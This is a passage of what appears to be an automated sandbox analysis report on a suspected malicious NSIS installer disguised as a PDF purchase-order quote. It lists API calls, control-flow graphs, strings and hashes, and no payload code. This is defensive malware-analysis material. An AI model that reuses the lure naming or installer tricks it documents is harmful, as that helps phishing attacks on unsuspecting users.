                                    • DeleteFileA.KERNELBASE(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B2
                                    • lstrcatA.KERNEL32(00421D30,\*.*,00421D30,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058FA
                                    • lstrcatA.KERNEL32(?,0040A014,?,00421D30,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040591B
                                    • lstrlenA.KERNEL32(?,?,0040A014,?,00421D30,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405921
                                    • FindFirstFileA.KERNEL32(00421D30,?,?,?,0040A014,?,00421D30,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405932
                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059DF
                                    • FindClose.KERNEL32(00000000), ref: 004059F0
                                    Strings
                                    • \*.*, xrefs: 004058F4
                                    • "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe", xrefs: 00405889
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405896
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                    • String ID: "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                    • API String ID: 2035342205-2799045629
                                    • Opcode ID: 26995f6469efc0b5a60458e08d56de8dc590e27ec954537a62243d1abfa56489
                                    • Instruction ID: 41c2b5987dba1b2e33ef8c3f02a16f7fa1ffbccb66a0b3bb43d54024ecdcecbe
                                    • Opcode Fuzzy Hash: 26995f6469efc0b5a60458e08d56de8dc590e27ec954537a62243d1abfa56489
                                    • Instruction Fuzzy Hash: 6251D070900A04EACB21AB618C89BBF7B78EF42724F54427BF851B51D1D73C4982DF6A
                                    APIs
                                    • FindFirstFileA.KERNELBASE(75923410,00422578,C:\,00405B8A,C:\,C:\,00000000,C:\,C:\,75923410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 00406440
                                    • FindClose.KERNEL32(00000000), ref: 0040644C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID: C:\$x%B
                                    • API String ID: 2295610775-3038660417
                                    • Opcode ID: f29c590cbb4ae7880d615934e2c411517b6bf54f8089bedae6efd123f54e346e
                                    • Instruction ID: 161293881315f5638f8ce2083a4c9c3eaa4ca925c072cbf9d6c71a91d4c8f3d6
                                    • Opcode Fuzzy Hash: f29c590cbb4ae7880d615934e2c411517b6bf54f8089bedae6efd123f54e346e
                                    • Instruction Fuzzy Hash: FED01231944130ABC3502B386E0C85B7B599F153313A2CB36F56AF12F0CB788C6296AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 634db48916f7a97cd593a88a8f27a2a6a53995630c6979533469a6cf2a501d9c
                                    • Instruction ID: b77f02bc2ee5da486f1689b8d44b34109ba54b696cf3d27aba4845a127c97f42
                                    • Opcode Fuzzy Hash: 634db48916f7a97cd593a88a8f27a2a6a53995630c6979533469a6cf2a501d9c
                                    • Instruction Fuzzy Hash: CEF17671D00269CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7385A86CF44

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 185 403c71-403c83 186 403dc4-403dd3 185->186 187 403c89-403c8f 185->187 188 403e22-403e37 186->188 189 403dd5-403e1d GetDlgItem * 2 call 404145 SetClassLongA call 40140b 186->189 187->186 190 403c95-403c9e 187->190 192 403e77-403e7c call 404191 188->192 193 403e39-403e3c 188->193 189->188 194 403ca0-403cad SetWindowPos 190->194 195 403cb3-403cb6 190->195 207 403e81-403e9c 192->207 199 403e3e-403e49 call 401389 193->199 200 403e6f-403e71 193->200 194->195 196 403cd0-403cd6 195->196 197 403cb8-403cca ShowWindow 195->197 202 403cf2-403cf5 196->202 203 403cd8-403ced DestroyWindow 196->203 197->196 199->200 222 403e4b-403e6a SendMessageA 199->222 200->192 206 404112 200->206 211 403cf7-403d03 SetWindowLongA 202->211 212 403d08-403d0e 202->212 208 4040ef-4040f5 203->208 210 404114-40411b 206->210 214 403ea5-403eab 207->214 215 403e9e-403ea0 call 40140b 207->215 208->206 217 4040f7-4040fd 208->217 211->210 220 403db1-403dbf call 4041ac 212->220 221 403d14-403d25 GetDlgItem 212->221 218 4040d0-4040e9 DestroyWindow EndDialog 214->218 219 403eb1-403ebc 214->219 215->214 217->206 223 4040ff-404108 ShowWindow 217->223 218->208 219->218 224 403ec2-403f0f call 406154 call 404145 * 3 GetDlgItem 219->224 220->210 225 403d44-403d47 221->225 226 403d27-403d3e SendMessageA IsWindowEnabled 221->226 222->210 223->206 255 403f11-403f16 224->255 256 403f19-403f55 ShowWindow KiUserCallbackDispatcher call 404167 EnableWindow 224->256 229 403d49-403d4a 225->229 230 403d4c-403d4f 225->230 226->206 226->225 233 403d7a-403d7f call 40411e 229->233 234 403d51-403d57 230->234 235 403d5d-403d62 230->235 233->220 238 403d98-403dab SendMessageA 234->238 239 403d59-403d5b 234->239 235->238 240 403d64-403d6a 235->240 238->220 239->233 241 403d81-403d8a call 40140b 240->241 242 403d6c-403d72 call 40140b 240->242 241->220 252 403d8c-403d96 241->252 251 403d78 242->251 251->233 252->251 255->256 259 403f57-403f58 256->259 260 403f5a 256->260 261 403f5c-403f8a GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403f8c-403f9d SendMessageA 261->262 263 403f9f 261->263 264 403fa5-403fdf call 40417a call 403c52 call 4060c1 lstrlenA call 406154 SetWindowTextA call 401389 262->264 263->264 264->207 275 403fe5-403fe7 264->275 275->207 276 403fed-403ff1 275->276 277 404010-404024 DestroyWindow 276->277 278 403ff3-403ff9 276->278 277->208 280 40402a-404057 CreateDialogParamA 277->280 278->206 279 403fff-404005 278->279 279->207 281 40400b 279->281 280->208 282 40405d-4040b4 call 404145 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->206 282->206 287 4040b6-4040c9 ShowWindow call 404191 282->287 289 4040ce 287->289 289->208
                                    APIs
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CAD
                                    • ShowWindow.USER32(?), ref: 00403CCA
                                    • DestroyWindow.USER32 ref: 00403CDE
                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403CFA
                                    • GetDlgItem.USER32(?,?), ref: 00403D1B
                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D2F
                                    • IsWindowEnabled.USER32(00000000), ref: 00403D36
                                    • GetDlgItem.USER32(?,00000001), ref: 00403DE4
                                    • GetDlgItem.USER32(?,00000002), ref: 00403DEE
                                    • SetClassLongA.USER32(?,000000F2,?), ref: 00403E08
                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E59
                                    • GetDlgItem.USER32(?,00000003), ref: 00403EFF
                                    • ShowWindow.USER32(00000000,?), ref: 00403F20
                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F32
                                    • EnableWindow.USER32(?,?), ref: 00403F4D
                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F63
                                    • EnableMenuItem.USER32(00000000), ref: 00403F6A
                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F82
                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403F95
                                    • lstrlenA.KERNEL32(nsvis Setup: Completed,?,nsvis Setup: Completed,00000000), ref: 00403FBF
                                    • SetWindowTextA.USER32(?,nsvis Setup: Completed), ref: 00403FCE
                                    • ShowWindow.USER32(?,0000000A), ref: 00404102
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                    • String ID: nsvis Setup: Completed
                                    • API String ID: 3282139019-3122139510
                                    • Opcode ID: 88472cc4d580f511b5a61cc057bfd9d3eebd51794cf4ea3c0b6aaec1f89545e8
                                    • Instruction ID: b3becc50dc3ae915ab1c9f271a4527fb908fa7fae9a455a684dda11466253fc4
                                    • Opcode Fuzzy Hash: 88472cc4d580f511b5a61cc057bfd9d3eebd51794cf4ea3c0b6aaec1f89545e8
                                    • Instruction Fuzzy Hash: 77C11071600204BFDB206F61ED49E2B3AB8FB85706F50053EF651B51F1CB799982AB2D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 290 4038d4-4038ec call 4064ca 293 403900-403931 call 405fa8 290->293 294 4038ee-4038fe call 40601f 290->294 298 403933-403944 call 405fa8 293->298 299 403949-40394f lstrcatA 293->299 302 403954-40397d call 403b99 call 405b47 294->302 298->299 299->302 308 403983-403988 302->308 309 403a04-403a0c call 405b47 302->309 308->309 310 40398a-4039ae call 405fa8 308->310 315 403a1a-403a3f LoadImageA 309->315 316 403a0e-403a15 call 406154 309->316 310->309 319 4039b0-4039b2 310->319 317 403ac0-403ac8 call 40140b 315->317 318 403a41-403a71 RegisterClassA 315->318 316->315 333 403ad2-403add call 403b99 317->333 334 403aca-403acd 317->334 321 403a77-403abb SystemParametersInfoA CreateWindowExA 318->321 322 403b8f 318->322 324 4039c3-4039cf lstrlenA 319->324 325 4039b4-4039c1 call 405a84 319->325 321->317 326 403b91-403b98 322->326 327 4039d1-4039df lstrcmpiA 324->327 328 4039f7-4039ff call 405a59 call 4060c1 324->328 325->324 327->328 332 4039e1-4039eb GetFileAttributesA 327->332 328->309 336 4039f1-4039f2 call 405aa0 332->336 337 4039ed-4039ef 332->337 343 403ae3-403afd ShowWindow call 40645c 333->343 344 403b66-403b67 call 4052ba 333->344 334->326 336->328 337->328 337->336 351 403b09-403b1b GetClassInfoA 343->351 352 403aff-403b04 call 40645c 343->352 347 403b6c-403b6e 344->347 349 403b70-403b76 347->349 350 403b88-403b8a call 40140b 347->350 349->334 355 403b7c-403b83 call 40140b 349->355 350->322 353 403b33-403b56 DialogBoxParamA call 40140b 351->353 354 403b1d-403b2d GetClassInfoA RegisterClassA 351->354 352->351 360 403b5b-403b64 call 403824 353->360 354->353 355->334 360->326
                                    APIs
                                      • Part of subcall function 004064CA: GetModuleHandleA.KERNEL32(?,?,?,00403385,0000000B), ref: 004064DC
                                      • Part of subcall function 004064CA: GetProcAddress.KERNEL32(00000000,?), ref: 004064F7
                                    • lstrcatA.KERNEL32(1033,nsvis Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,nsvis Setup: Completed,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe",00000000), ref: 0040394F
                                    • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets,1033,nsvis Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,nsvis Setup: Completed,00000000,00000002,75923410), ref: 004039C4
                                    • lstrcmpiA.KERNEL32(?,.exe), ref: 004039D7
                                    • GetFileAttributesA.KERNEL32(: Completed), ref: 004039E2
                                    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets), ref: 00403A2B
                                      • Part of subcall function 0040601F: wsprintfA.USER32 ref: 0040602C
                                    • RegisterClassA.USER32(00423EC0), ref: 00403A68
                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A80
                                    • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AB5
                                    • ShowWindow.USER32(00000005,00000000), ref: 00403AEB
                                    • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403B17
                                    • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403B24
                                    • RegisterClassA.USER32(00423EC0), ref: 00403B2D
                                    • DialogBoxParamA.USER32(?,00000000,00403C71,00000000), ref: 00403B4C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                    • String ID: "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$nsvis Setup: Completed
                                    • API String ID: 1975747703-1381784961
                                    • Opcode ID: c9078dae625b6f4b5fdad37e38e1f8e9c4a43360c011d7f7777f28fc6933afc9
                                    • Instruction ID: 8119f10372a92e3ad89c0c28339df669361e1c2b2a074a7ad4fa5a04607ec86b
                                    • Opcode Fuzzy Hash: c9078dae625b6f4b5fdad37e38e1f8e9c4a43360c011d7f7777f28fc6933afc9
                                    • Instruction Fuzzy Hash: CC61B4703402446ED620AF65AD45F3B3AACEB8574AF40053FF991B62E3CB7D5D029A2D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 364 402ea1-402eef GetTickCount GetModuleFileNameA call 405c5a 367 402ef1-402ef6 364->367 368 402efb-402f29 call 4060c1 call 405aa0 call 4060c1 GetFileSize 364->368 369 4030d1-4030d5 367->369 376 403014-403022 call 402e3d 368->376 377 402f2f 368->377 384 403024-403027 376->384 385 403077-40307c 376->385 379 402f34-402f4b 377->379 381 402f4d 379->381 382 402f4f-402f58 call 4032b4 379->382 381->382 389 40307e-403086 call 402e3d 382->389 390 402f5e-402f65 382->390 387 403029-403041 call 4032ca call 4032b4 384->387 388 40304b-403075 GlobalAlloc call 4032ca call 4030d8 384->388 385->369 387->385 411 403043-403049 387->411 388->385 415 403088-403099 388->415 389->385 393 402fe1-402fe5 390->393 394 402f67-402f7b call 405c15 390->394 398 402fe7-402fee call 402e3d 393->398 399 402fef-402ff5 393->399 394->399 413 402f7d-402f84 394->413 398->399 406 403004-40300c 399->406 407 402ff7-403001 call 406581 399->407 406->379 414 403012 406->414 407->406 411->385 411->388 413->399 417 402f86-402f8d 413->417 414->376 418 4030a1-4030a6 415->418 419 40309b 415->419 417->399 420 402f8f-402f96 417->420 421 4030a7-4030ad 418->421 419->418 420->399 423 402f98-402f9f 420->423 421->421 422 4030af-4030ca SetFilePointer call 405c15 421->422 426 4030cf 422->426 423->399 425 402fa1-402fc1 423->425 425->385 427 402fc7-402fcb 425->427 426->369 428 402fd3-402fdb 427->428 429 402fcd-402fd1 427->429 428->399 430 402fdd-402fdf 428->430 429->414 429->428 430->399
                                    APIs
                                    • GetTickCount.KERNEL32 ref: 00402EB2
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe,00000400), ref: 00402ECE
                                      • Part of subcall function 00405C5A: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe,80000000,00000003), ref: 00405C5E
                                      • Part of subcall function 00405C5A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C80
                                    • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe,C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe,80000000,00000003), ref: 00402F1A
                                    • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                    Strings
                                    • C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
                                    • C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
                                    • soft, xrefs: 00402F8F
                                    • "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe", xrefs: 00402EA1
                                    • Null, xrefs: 00402F98
                                    • Error launching installer, xrefs: 00402EF1
                                    • Inst, xrefs: 00402F86
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                    • String ID: "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                    • API String ID: 2803837635-3108918559
                                    • Opcode ID: 1fdbf8666ac545bea4b4f259f72344d0a52c8dbd42631ed96dcafa73090d8d3a
                                    • Instruction ID: 301210c85c1c672c97290be40cd2ab013445f980247fce5a821d6afddb5369d2
                                    • Opcode Fuzzy Hash: 1fdbf8666ac545bea4b4f259f72344d0a52c8dbd42631ed96dcafa73090d8d3a
                                    • Instruction Fuzzy Hash: 8851C171A01204ABDF20AF65DD85BAE7FB8EB40369F11413BF504B22D5C7789E818B9D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 431 406154-40615f 432 406161-406170 431->432 433 406172-406188 431->433 432->433 434 406379-40637d 433->434 435 40618e-406199 433->435 436 406383-40638d 434->436 437 4061ab-4061b5 434->437 435->434 438 40619f-4061a6 435->438 440 406398-406399 436->440 441 40638f-406393 call 4060c1 436->441 437->436 439 4061bb-4061c2 437->439 438->434 442 4061c8-4061fc 439->442 443 40636c 439->443 441->440 445 406202-40620c 442->445 446 406319-40631c 442->446 447 406376-406378 443->447 448 40636e-406374 443->448 449 406226 445->449 450 40620e-406212 445->450 451 40634c-40634f 446->451 452 40631e-406321 446->452 447->434 448->434 456 40622d-406234 449->456 450->449 453 406214-406218 450->453 457 406351-406358 call 406154 451->457 458 40635d-40636a lstrlenA 451->458 454 406331-40633d call 4060c1 452->454 455 406323-40632f call 40601f 452->455 453->449 459 40621a-40621e 453->459 469 406342-406348 454->469 455->469 461 406236-406238 456->461 462 406239-40623b 456->462 457->458 458->434 459->449 465 406220-406224 459->465 461->462 467 406274-406277 462->467 468 40623d-406258 call 405fa8 462->468 465->456 470 406287-40628a 467->470 471 406279-406285 GetSystemDirectoryA 467->471 477 40625d-406260 468->477 469->458 473 40634a 469->473 475 4062f7-4062f9 470->475 476 40628c-40629a GetWindowsDirectoryA 470->476 474 4062fb-4062fe 471->474 478 406311-406317 call 40639c 473->478 474->478 481 406300-406304 474->481 475->474 480 40629c-4062a6 475->480 476->475 477->481 482 406266-40626f call 406154 477->482 478->458 485 4062c0-4062d6 SHGetSpecialFolderLocation 480->485 486 4062a8-4062ab 480->486 481->478 483 406306-40630c lstrcatA 481->483 482->474 483->478 490 4062f4 485->490 491 4062d8-4062f2 SHGetPathFromIDListA CoTaskMemFree 485->491 486->485 489 4062ad-4062b4 486->489 492 4062bc-4062be 489->492 490->475 491->474 491->490 492->474 492->485
                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 0040627F
                                    • GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,00405220,Completed,00000000), ref: 00406292
                                    • SHGetSpecialFolderLocation.SHELL32(00405220,00000000,?,Completed,00000000,00405220,Completed,00000000), ref: 004062CE
                                    • SHGetPathFromIDListA.SHELL32(00000000,: Completed), ref: 004062DC
                                    • CoTaskMemFree.OLE32(00000000), ref: 004062E8
                                    • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040630C
                                    • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,00405220,Completed,00000000,00000000,004178E0,00000000), ref: 0040635E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                    • String ID: : Completed$>%{$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                    • API String ID: 717251189-1155891884
                                    • Opcode ID: b9f03b5936b094526a68e4ab87593b997b03d55e1f088675cc754777caf79d28
                                    • Instruction ID: 8fbc972aa6bd3719c406fe4e3ec738975147f7369702dd1472e60f0af39698f0
                                    • Opcode Fuzzy Hash: b9f03b5936b094526a68e4ab87593b997b03d55e1f088675cc754777caf79d28
                                    • Instruction Fuzzy Hash: 31610671900111AADF20AF65DC84BBE3BA4AB46310F12417FE953B62D1C73C49A2CB9D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
